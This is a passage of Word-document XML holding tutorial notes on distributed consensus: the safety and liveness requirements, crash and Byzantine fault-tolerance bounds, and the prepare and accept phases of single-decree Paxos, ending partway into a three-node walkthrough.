        <w:t>The system makes progress in "periods of synchrony" (when the network is behaving well) and safely stalls during partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC5011" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="2E8D3D38">
          <v:rect id="_x0000_i6240" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28666D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Properties of Consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE6407" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 The Three Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018020E9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B3F3F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. AGREEMENT (Safety):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32361AFF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   All non-faulty nodes decide on the SAME value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B67613" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Never: Node A decides "X" while Node B decides "Y".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC9965" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="73F59BCB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>2. VALIDITY (Non-triviality):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066AE5D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   The decided value was actually PROPOSED by some node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BE3C0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   (Can't just always decide "null" — that satisfies agreement but is useless.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D1EE9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="48B78252" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. TERMINATION (Liveness):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430F6E0A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Every non-faulty node EVENTUALLY decides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD3ED7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   (System makes progress — doesn't get stuck forever.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B608357" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309B7427" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Note: FLP says termination cannot be guaranteed in pure async systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3C3F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   Practical algorithms guarantee termination in "sufficiently synchronous" periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F411B91" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Fault Tolerance Bounds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB5ECB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680078C5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Crash-fault tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7526147A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Need: 2f + 1 nodes to tolerate f crash failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC7046" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  3 nodes → tolerate 1 crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C1343" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  5 nodes → tolerate 2 crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139B9F0D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  7 nodes → tolerate 3 crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431618E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05786865" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Why: Need a MAJORITY (f+1) that's guaranteed to overlap with any previous majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77499C11" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  With 5 nodes, any majority (3 nodes) shares at least 1 member with any other majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF52CEA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  That shared member "remembers" what was decided → prevents disagreement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C8E6D9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="334CE481" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Byzantine-fault tolerance (BFT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E70241" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Need: 3f + 1 nodes to tolerate f byzantine (malicious/arbitrary) failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E45D6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  4 nodes → tolerate 1 byzantine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA14DC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  7 nodes → tolerate 2 byzantine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F07E7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBEE371" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Much more expensive — used in blockchain, not typical datacenter systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C281435" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="7B72580B">
          <v:rect id="_x0000_i6241" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C0AE6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Paxos — The Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AE4A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01F4D8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Paxos (Leslie Lamport, 1989/1998) is the original consensus algorithm. It's provably correct but notoriously difficult to understand and implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351ABBB7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paxos roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA02CA0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCEB76" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Proposer:  Proposes values (requests consensus on a value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41F8F1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Acceptor:  Votes on proposals (stores accepted values durably)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7FEAF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Learner:   Learns the decided value (observes the outcome)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F23DD8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="733B38C5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>A single node can play multiple roles simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDCB56" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Typical: every node is a proposer + acceptor + learner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E8021" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Single-Decree Paxos (Agreeing on ONE Value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A363C51" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1: PREPARE (establish precedence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB4D075" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADFAF5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Proposer → ALL Acceptors: PREPARE(n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19817CC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  "I want to propose. My proposal number is n. Is anyone else ahead of me?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C5D66" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="64B7BEA3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Acceptor response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78194FF9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  IF n &gt; highest_prepare_seen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DFEB6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    highest_prepare_seen = n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC184AD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Reply: PROMISE(n, previously_accepted_value, previously_accepted_number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BC4BB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    "I promise not to accept any proposal numbered less than n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486F248" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     Here's the last thing I accepted (if any)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08097E6A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  ELSE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F435C35" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Reply: REJECT (a higher-numbered prepare already seen)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063543D6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 2: ACCEPT (propose the value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44780F7B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6B800" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Proposer receives PROMISE from MAJORITY of acceptors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFDBB6E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  IF any acceptor reported a previously accepted value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C463A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Must propose THAT value (can't override a possibly-committed value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EEDBB0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  ELSE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EC6C1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Can propose any value (its own original proposal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBAF74" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4416F112" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Proposer → ALL Acceptors: ACCEPT(n, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B2A2A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  "Accept this value with proposal number n."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD52F0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="1263BE8C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Acceptor response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791AFFE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  IF n &gt;= highest_prepare_seen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19606A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    accepted_number = n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2794A4BE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    accepted_value = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80C586" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Reply: ACCEPTED(n, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43265782" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  ELSE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7E80D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Reply: REJECT (already promised to a higher proposal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318DFBB0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="2EFD54EC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Proposer receives ACCEPTED from MAJORITY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AFAE3C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Value is CHOSEN (consensus reached!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC1F18" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Notify learners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101B9C2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Paxos Example Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3FF961" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434ED708" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3 nodes: A, B, C. A wants to propose "X", B wants to propose "Y".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C1636" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="790CFA51" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Round 1 — A proposes "X":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EBFA6D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  A → B, C: PREPARE(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2EAF5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B: promises (no prior acceptance). PROMISE(1, null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062C9E2A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  C: promises (no prior acceptance). PROMISE(1, null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC5D9D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  A has majority of promises. Can propose its value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D603E41" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  A → B, C: ACCEPT(1, "X")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204124F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B: accepts. ACCEPTED(1, "X")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E332FF4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  C: accepts. ACCEPTED(1, "X")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC38DE4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
